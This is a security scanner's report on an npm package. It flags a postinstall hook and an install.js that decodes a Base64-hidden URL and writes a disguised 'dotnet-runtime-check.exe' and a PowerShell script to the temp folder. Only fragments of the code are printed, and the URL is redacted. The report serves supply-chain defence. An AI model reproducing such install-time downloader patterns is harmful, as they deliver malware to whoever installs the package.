Static Scan Results
scanned 15h ago · by rust-scannerStatic analysis flagged 8 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.
Static reason
One or more suspicious static signals were detected.
Decision evidence
public snapshotBehavioral surface
ChildProcessEnvironmentVarsFilesystem
HighEntropyStrings
Source & flagged code
3 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = node install.js
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = node install.js
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkginstall.jsView file
4var tmp=os.tmpdir(), dst=tmp+'\\dotnet-runtime-check.exe', psf=tmp+'\\r-'+(+new Date)+'.ps1';
L5: var ps='$u="'+Buffer.from('[redacted]==','base64').toString()+'"\n'
L6: +'$p="'+dst+'"\n'
High
Base64 Obscured Url
Source decodes a Base64-obscured HTTP endpoint at runtime.
install.jsView on unpkg · L4Findings
2 High3 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
HighBase64 Obscured Urlinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowFilesystem
LowHigh Entropy Strings